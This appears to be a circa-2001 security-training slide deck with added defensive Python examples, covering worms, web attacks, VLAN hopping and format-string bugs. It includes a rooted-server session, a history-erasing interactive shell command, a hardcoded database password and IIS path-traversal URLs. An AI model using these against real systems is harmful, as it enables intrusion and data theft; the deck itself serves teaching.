#> rlogin -l root tgtsunprod2 last login: tue jul 3 14:52:41 from tgtsunprod1 sun microsystems...

57 pages

Upload: elvin-bell

Post on 16-Jan-2016


Page 1: #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning
Page 2:
Page 3:

#> rlogin -l root tgtsunprod2
Last login: Tue Jul 3 14:52:41 from tgtsunprod1
Sun Microsystems Inc.   SunOS 5.8   Generic February 2000
***** Warning Government Classified Server ***
You have mail.
tgtsunprod2 # /usr/sbin/ifconfig -a
lo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1
        inet 127.0.0.1 netmask ff000000
qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
        inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255
        ether 8:0:20:f7:d0:78
dhsunprod2 # uname -a
SunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80
tgtsunprod2 # id
uid=0(root) gid=1(other)

final target compromised

Page 4:

Who am I?

Page 5:

The Threat is Active

• The blackhat community is extremely active.
  – 20+ unique scans a day.
  – 100% - 900% increase of activity from 2000 to 2001
  – It's only getting worse

Don't Underestimate Cyberterrorists

Information Security is Important …

Page 6:

…because we have so many friends

Pages 7-10: same slide as Page 6

Page 11:

The Attack


[..]

68.168.1.15:52312 -> 127.0.0.1:443
export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.

68.168.1.15:52312 -> 127.0.0.1:443

Page 12:

Doom on You….

<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
   Set Db = Server.CreateObject("Commerce.DbServer")
   Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
   Db.Application = "http://10.1.1.16/"
   Set Application("Db") = Db
End Sub
Sub Session_OnStart
   '==Visual InterDev Generated - DataConnection startspan==
   '--Project Data Connection
   Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
   Session("DataConn_ConnectionTimeout") = 15
   Session("DataConn_CommandTimeout") = 30
   Session("DataConn_RuntimeUserName") = ""
   Session("DataConn_RuntimePassword") = ""
   '==Visual InterDev Generated - DataConnection endspan==
End Sub
</SCRIPT>

User ID: sa

Password: n0t4u2c
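The credential on this slide lives in a quoted connection string inside global.asa. As an added example (not from the deck), the Python below scans ASP/global.asa text for connection strings that embed a user and password and reports them with the password redacted; the sample text is constructed to mirror the slide.

```python
import re

# Constructed global.asa excerpt shaped like the slide's (not the deck's file).
SAMPLE_GLOBAL_ASA = r'''
Sub Application_OnStart
   Set Db = Server.CreateObject("Commerce.DbServer")
   Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
   Db.Application = "http://10.1.1.16/"
End Sub
Sub Session_OnStart
   Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;FIL=MS Access;"
   Session("DataConn_RuntimeUserName") = ""
   Session("DataConn_RuntimePassword") = ""
End Sub
'''

STRING_LITERAL = re.compile(r'"([^"]*)"')   # VBScript has no escaped quotes

def parse_conn_string(s):
    """Split an ODBC-style 'KEY=value;KEY=value' string into a dict
    with lower-cased keys; parts without '=' are ignored."""
    out = {}
    for part in s.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().lower()] = value.strip()
    return out

def find_embedded_credentials(text):
    """Return (line_no, user, redacted_password) for every quoted string
    literal that carries both a user name and a non-empty password."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for literal in STRING_LITERAL.findall(line):
            kv = parse_conn_string(literal)
            user = kv.get("uid") or kv.get("user id")
            pwd = kv.get("pwd") or kv.get("password")
            if user and pwd:
                # Never echo the secret itself into a report or log.
                findings.append((line_no, user, "*" * len(pwd)))
    return findings

def uses_privileged_login(findings):
    """Flag findings that authenticate as the SQL Server 'sa' account."""
    return [f for f in findings if f[1].lower() == "sa"]
```

A hit on `sa` is two findings in one: a secret checked into source and a web application running with full database administrator rights.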

Page 13:

Trojan Horse Sept 26, 2001

• Crackers posted a Trojan Horse masquerading as a wu-ftpd exploit on the Vuln-Dev mailing list.

• If the code is compiled and run, it will delete most files on the host’s hard drive

Page 14:

XSS Filter-Bypass Manipulation

• This technique is used to pass various types of client-side scripting language through implemented security filters.

• The idea is to be able to achieve client-side execution of a client-side script.

• There are several techniques used to perform this attack.

Page 15:

E-mail Virus Oct 2001

• BP Openworld’s billing department has been sending out the BadTrans virus with its responses to recent e-mail inquiries
  – The virus launches a Trojan horse in infected machines
  – BP Openworld is a subsidiary of British Telecommunications offering internet services for business and home use

Page 16:

Format String Vulnerabilities

Any call that passes user-supplied input directly to a *printf()-family function is dangerous. These calls can also be identified by their argument deficiency. Consider this code:

printf("%s", userdata);

printf(userdata);    ← Argument deficiency
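The "argument deficiency" test can be mechanised. As an added example (not from the deck), the Python below is a small source lint that finds *printf-family calls whose format argument is not a string literal, and literal formats that consume more arguments than the call supplies; the C snippet it runs on is constructed to echo the two calls on the slide.

```python
import re

# *printf-family names mapped to the 0-based index of their format argument.
PRINTF_FAMILY = {
    "printf": 0, "vprintf": 0, "fprintf": 1, "vfprintf": 1, "sprintf": 1,
    "vsprintf": 1, "snprintf": 2, "vsnprintf": 2, "syslog": 1,
}
CALL_RE = re.compile(r"\b(" + "|".join(PRINTF_FAMILY) + r")\s*\(")
# One conversion spec (flags, width, precision, length, conversion) or '%%'.
CONV_RE = re.compile(
    r"%(?:[-+ #0]*(?:\*|\d+)?(?:\.(?:\*|\d+))?(?:hh|h|ll|l|L|j|z|t)?[diouxXeEfFgGaAcspn]|%)")

def call_args(src, open_idx):
    """Argument texts of the call whose '(' sits at open_idx, split on
    top-level commas (commas inside strings or nested parens are kept)."""
    args, cur, depth, in_str, i = [], "", 0, False, open_idx + 1
    while i < len(src):
        ch = src[i]
        if in_str:
            cur += ch
            if ch == "\\" and i + 1 < len(src):  # keep the escaped char
                i += 1
                cur += src[i]
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str, cur = True, cur + ch
        elif ch == "(":
            depth, cur = depth + 1, cur + ch
        elif ch == ")" and depth > 0:
            depth, cur = depth - 1, cur + ch
        elif ch == ")":
            break                                 # end of this call
        elif ch == "," and depth == 0:
            args.append(cur.strip())
            cur = ""
        else:
            cur += ch
        i += 1
    args.append(cur.strip())
    return args

def conversions_needed(fmt_literal):
    """Arguments a literal format consumes ('*' width/precision count too)."""
    return sum(1 + m.group(0).count("*")
               for m in CONV_RE.finditer(fmt_literal) if m.group(0) != "%%")

def find_format_string_risks(src):
    """Report (line, function, problem): a format that is not a string
    literal, or a literal that consumes more arguments than were supplied."""
    findings = []
    for m in CALL_RE.finditer(src):
        name, args = m.group(1), call_args(src, m.end() - 1)
        idx = PRINTF_FAMILY[name]
        if len(args) <= idx:
            continue
        fmt, line = args[idx], src.count("\n", 0, m.start()) + 1
        if not (fmt.startswith('"') and fmt.endswith('"')):
            findings.append((line, name, "non-literal format"))
        elif not name.startswith("v"):            # v* variants take a va_list
            needed, supplied = conversions_needed(fmt), len(args) - idx - 1
            if needed > supplied:
                findings.append((line, name, f"format needs {needed} args, {supplied} supplied"))
    return findings

# Constructed C snippet (not from the deck) echoing the slide's two calls.
SAMPLE_C = r'''printf("%s", userdata);
printf(userdata);
fprintf(stderr, userdata);
snprintf(buf, sizeof buf, "%d%%", n);
syslog(LOG_INFO, "%s: %d", msg);
'''
```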

Page 17:

Fingerprint Recognition: Sensors (I)

• Optical fingerprint sensor [Fingerprint Identification Unit FIU-001/500 by Sony]

• Electro-optical sensor [DELSY® CMOS sensor module]

• Capacitive sensor [FingerTIP™ by Infineon]

Page 18:

Physical Access Controls

• Network Segregation
• Perimeter Security
• Security Guards
• Badge Systems
• Biometric Access Controls
• Closed Circuit TV Monitoring
• Sensors & Alarms

Page 19:

World Trade Center Virus

• The destructive TROJ_VOTE.A e-mail virus exploits the WTC tragedy
  – It attacks the infected user’s address book to spread and send a message about peace between America and Islam
  – It also installs two VBS files which attempt to delete the Windows directory on reboot

Page 20:

The Threat from the Insider

Page 21:

NIMDA Worm

• The NIMDA worm raced around the world in only 30 minutes when it was first released in Sept 2001

• Some AV experts recommended disconnecting from the Internet until patches and upgrades could be put into effect.

Page 22:

Iris Recognition

System for passive iris recognition by Sensar

Page 23:

Wireless Attacks

• Wireless hacking is an increasing threat to wired networks
  – Attackers can penetrate, monitor, and manipulate data on traditional wired networks by accessing the system through its wireless sub-network.
  – The attacker can intercede between two wired hosts behind a firewall, between a wired host and a wireless host, or between two wireless clients
  – Uses a “man-in-the-middle” Address Resolution Protocol (ARP) cache poisoning attack.

Page 24:

Attack the Architecture

[Diagram: request flow inside the web server. The web server dispatches by file type to a default handler, an html handler, an shtml handler, a jsp handler and a cgi handler. The html handler returns a text/html header and the html file. The shtml handler processes SSI tags (#exec, which runs a command through /bin/sh, and #include, which pulls in an include file) and returns a text/html header. The jsp handler processes JSP tags, hands the result to the Java compiler, and runs the resulting class in the Java runtime. The cgi handler runs a script/executable (cgi: sh, perl, …) and returns a text/html header.]

Page 25:

SirCam Worm

• SirCam surfaced in mid-July 2001
  – Scoops up documents in an infected PC and mails them to people in the user’s address book
  – The most damaging aspect is its ability to enlist dormant viruses in the users’ files and mail them to others
  – Result: viruses that might not have spread very far alone get wider distribution and older viruses will get new life
  – By Aug 2001, SirCam had infected over 100,000 computers in the US

Page 26:

Viruses – File (Parasitic) Viruses

• Simple File Viruses
  – After transplanting itself in the executable, the executable often doesn’t work

• Stealth Component
  – Work very similar to stealth system sector viruses

• Mask the file size of infected files when a directory listing is done on them

Page 27:

CyberTerrorism – Oct 2001

• The Pakistani hacker group G-Force defaced a US government web site and threatened to turn over “some very high confidential US data” to al-Qaeda officials if the war on terrorism continues

• This comes days after a government warning of sophisticated and sustained cyberattacks launched by pro-Muslim hacker groups such as G-Force, Doktor Nuker, and the Pakistan Hackerz Club

Page 28:

Redesi Worm – Oct 2001

• An e-mail attachment purporting to be a Microsoft software security patch is actually a worm
  – It spreads through e-mail
  – On Nov 11 the worm will reformat the C: drive of infected machines

Page 29:

Discretionary Access Control List (DACL)

• The DACL controls who can access the object and how.
  – permissions for only one user or one group at a time
  – the object's Access Control Settings

Page 30:

Credit Card Stealing Trojan

• Reported on Oct 29, 2001 - Septer
  – Preying on sympathies for terrorist attack victims, a credit card stealing trojan horse masquerading as an appeal for donations from the American Red Cross is making the rounds via e-mail
  – Users click on the executable attachment and a donation request form loads. If completed, credit card numbers and contact information are saved and uploaded to a Web site.

Page 31:

NT Rootkit

• Rootkit console with Keyboard sniffing

Page 32:

Former Employee Attack

• Wendy Sholds allegedly broke into her former boss’s computer
  – She forwarded confidential e-mail to other employees
  – She used the boss’s username and password to view private information on the company web site

Page 33:

Security Models

• Security Models
  – Bell-LaPadula
  – Biba
  – Chinese Walls
  – Clark-Wilson

Page 34:

Hacker Alliance

• Three pro-Islamic hacker groups have joined forces to carry out attacks
  – Each group is carrying out digital attacks under a common banner
  – They are anti-Israel, anti-US/UK, anti-India

Page 35:

IIS Double Hex

Round 1 Decoding: scripts/..%255c../winnt becomes: scripts/..%5c../winnt (%25 = “%” character)

Round 2 Decoding: scripts/..%5c../winnt becomes: scripts/..\../winnt

Directory path traversal is now possible using path obfuscation through Double Hex Encoding.

Page 36:

USA Today Site Hacked

• The “USA Today” website was defaced with six bogus stories

• The site was taken offline for three hours

Page 37:

Security Testing

• Software will never be placed or deployed into a trusted or predictable environment

• Security testing requires attacking the software in a way that exercises the trust relationships.

• The software should be tested in ways that are unexpected while observing for behaviors that are unknown.

Page 38:

Student Data Exposed

• The permission level to access web logs at Resicom, a telecommunications company that provides intra-campus phone services to colleges, was set too low
  – It allowed people to search for student names, social security numbers and addresses

Page 39:

Microsoft Misrepresented Security

• A Federal Trade Commission (FTC) investigation found that Microsoft misrepresented both the level of security provided and the amount of data collected by its Passport services
  – Microsoft agreed to refrain from making false claims about the information it collects and will submit to an independent audit of its security program every two years.

Page 40:

Programming Satan’s Computer

Page 41:

Cell Phone Virus

• A worm-type virus called Timofonica hit customers of Spain’s Movistar service
  – It sends text messages scrolling across the screens of cellular phones
  – It is the first virus known to target cell phones
  – We can now expect copycat viruses targeting cell phones and other hand-held devices such as Palm Pilots and Pocket PC computers

Page 42:

Microsoft Breakin

• A hacker broke into BetaPlace.com, Microsoft's web site for betatesters
  – evidently someone's log-in credentials were leaked to the Internet.
  – Microsoft shut down the site after it became aware of the breach; it also reset user passwords.
  – The site contains unreleased versions of Windows, other software and activation keys.
  – A spokesman said the intruder did not access source code. The event has sparked a criminal investigation.

Page 43:

HTTP 1.1 Methods

The Method token indicates the method to be performed on the resource identified by the Request-URI.

Page 44:

Buffer Overflows

• Overwrite return address
  – Examples of shell-code strings for Linux on Intel, SPARC Solaris and Windows


Page 45:

Different Threat Scenarios

1. Regular biometric sensor using artificially generated biometric data

2. Replay attack of eavesdropped biometric data

3. Manipulation of stored biometric reference data

Page 46:

SNMP Management

Page 47:

Normal CAM Behavior III

[Diagram: a switch with hosts A, B and C on Ports 1, 2 and 3. After learning, the CAM table holds MAC A on Port 1, MAC B on Port 2 and MAC C on Port 3. When A sends to B, the switch knows B is on Port 2 and forwards the frame only there, so C (on Port 3) says: I do not see traffic to B!]

CAM table:
  MAC   Port
  A     1
  B     2
  C     3
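The learning and forwarding behaviour the diagram shows, as an added Python model (not from the deck): the switch learns each source MAC on its ingress port, floods frames for unknown destinations, and sends known unicast out of one port only, which is why C stops seeing traffic to B once B has been learned. The topology is constructed to match the slide.

```python
class LearningSwitch:
    """Minimal model of a switch CAM table (MAC -> port), as on the slide."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.cam = {}

    def receive(self, in_port, src, dst):
        """Learn src on in_port, then return the egress ports for dst:
        one port if dst is known, every other port (flood) if it is not."""
        self.cam[src] = in_port              # learn or refresh the source
        if dst in self.cam:
            out = self.cam[dst]
            return [] if out == in_port else [out]   # never send back out the ingress port
        return [p for p in self.ports if p != in_port]

def who_sees(switch, hosts, in_port, src, dst):
    """hosts maps name -> port; return the host names that receive the frame."""
    egress = switch.receive(in_port, src, dst)
    return sorted(name for name, port in hosts.items() if port in egress)

# Constructed topology matching the slide: A, B, C on ports 1, 2, 3.
HOSTS = {"A": 1, "B": 2, "C": 3}
```

The first frame from A to an unlearned B is flooded and C does see it; once B has spoken, the CAM entry for B confines A's traffic to Port 2.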

Page 48:

Double Encapsulated 802.1q VLAN Hopping Attack

• Send double encapsulated 802.1Q frames
• Switch performs only one level of decapsulation
• Unidirectional traffic only
• Works even if trunk ports are set to off

Strip off first, and send back out

Note: Only works if trunk has the same native VLAN as the attacker
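To make the single-decapsulation point and its native-VLAN precondition concrete, here is an added Python model (not from the deck): it parses the 802.1Q tag stack of a frame, applies the slide's one-tag strip only when the outer tag equals the trunk's native VLAN, and offers a detection rule for a monitor on an access port. Frames, addresses and the switch behaviour are constructed and simplified assumptions, not captured traffic.

```python
import struct

ETH_P_8021Q = 0x8100     # 802.1Q tag protocol identifier
ETH_P_IP = 0x0800

def build_frame(dst, src, vids, payload):
    """Assemble a constructed Ethernet frame carrying zero or more stacked
    802.1Q tags (outermost first) in front of an IPv4 ethertype."""
    tags = b"".join(struct.pack("!HH", ETH_P_8021Q, vid & 0x0FFF) for vid in vids)
    return dst + src + tags + struct.pack("!H", ETH_P_IP) + payload

def parse_vlan_stack(frame):
    """Return (vids outer-to-inner, ethertype after the tags, payload offset)."""
    vids, off = [], 12
    while len(frame) >= off + 4 and struct.unpack("!H", frame[off:off + 2])[0] == ETH_P_8021Q:
        tci = struct.unpack("!H", frame[off + 2:off + 4])[0]
        vids.append(tci & 0x0FFF)        # low 12 bits of the TCI are the VLAN id
        off += 4
    ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    return vids, ethertype, off + 2

def switch_forward_vid(frame, native_vid):
    """Assumed model of the slide's single decapsulation: if the outer tag
    equals the trunk's native VLAN, strip exactly that tag; the frame is then
    handled on whatever VLAN the next tag names. Returns (vid, frame_sent)."""
    vids, _, _ = parse_vlan_stack(frame)
    if not vids:
        return native_vid, frame
    if vids[0] != native_vid:
        return vids[0], frame            # outer tag kept: stays in that VLAN
    inner = frame[:12] + frame[16:]      # remove the first 4-byte tag only
    rest = parse_vlan_stack(inner)[0]
    return (rest[0] if rest else native_vid), inner

def is_double_tagged(frame):
    """Detection rule for a monitor on an access port: a host frame should
    never arrive with more than one 802.1Q tag."""
    return len(parse_vlan_stack(frame)[0]) > 1

# Constructed addresses and payload (not from the deck).
DST = bytes.fromhex("ffffffffffff")
SRC = bytes.fromhex("020000000001")
DOUBLE_TAGGED = build_frame(DST, SRC, [1, 20], b"\x45\x00")
SINGLE_TAGGED = build_frame(DST, SRC, [1], b"\x45\x00")
```

With native VLAN 1 the inner tag for VLAN 20 survives the strip; with any other native VLAN the outer tag is kept and the frame never leaves VLAN 1, which is the precondition the slide's note states.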

Page 49:

Hacking Cisco

Cisco Bugtraq Vulnerabilities

• 1998 - 3
• 1999 - 5
• 2000 - 23
• 2001 - 46
• 2002 (est) - 94

Page 50:

Typical Web Application Set-Up

[Diagram: a web client sends an HTTP request (cleartext or SSL) through a firewall to the web server (Apache, IIS, Netscape, etc.). Web apps run on the server as plugins (Perl, C/C++, JSP, etc.) and reach the SQL databases over a database connection (ADO, ODBC, etc.). The HTTP reply carries HTML, Javascript, VBscript, etc.]

Page 51:

Traditional Hacking

• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.

• In short, it is a complex activity with a limited practitioner base.

...
winsock_found:
    xor eax, eax
    push eax
    inc eax
    push eax
    inc eax
    push eax
    call socket
    cmp eax, -1
    jnz socket_ok

    push sockerrl
    push offset sockerr
    call write_console
    jmp quit2

socket_ok:
    mov sock, eax
    mov sin.sin_family, 2
    mov esi, offset _port
...

Page 52:

NT IIS Showcode ASP Vulnerability

• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0

• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.

http://www.someserver.com/msadc/Samples/SELECTOR/Showcode.asp?source=/msadc/Samples/../../../../../boot.ini

Page 53:

The MDAC Attack

[Diagram, client side: Internet Explorer or VB.exe drives the RDS Data Control and RDS Data Space, which talk to the server over Remote Data Service (URL / HTML). Server side: IIS hosts ASP (ADO) and the RDS Data Factory with Custom Business Objects; these reach the data through OLE DB, the ODBC provider and the Jet 3.5 provider.]

Page 54:

Missile of Death

[Diagram: the same WebServer / Web app / DB layout as the Typical Web Application Set-Up slide]

Page 55:

An Example: Brute Forcing Session IDs in URLs (AUTOMATED DEMO!)

Page 56:

$8.8 Billion Mistake by Microsoft

• According to Computer Economics, the worldwide economic impact of the Love Bug Virus was estimated at $8.75 billion

• The fact that Microsoft Outlook was designed to execute programs that were mailed to it made the virus possible.

Page 57: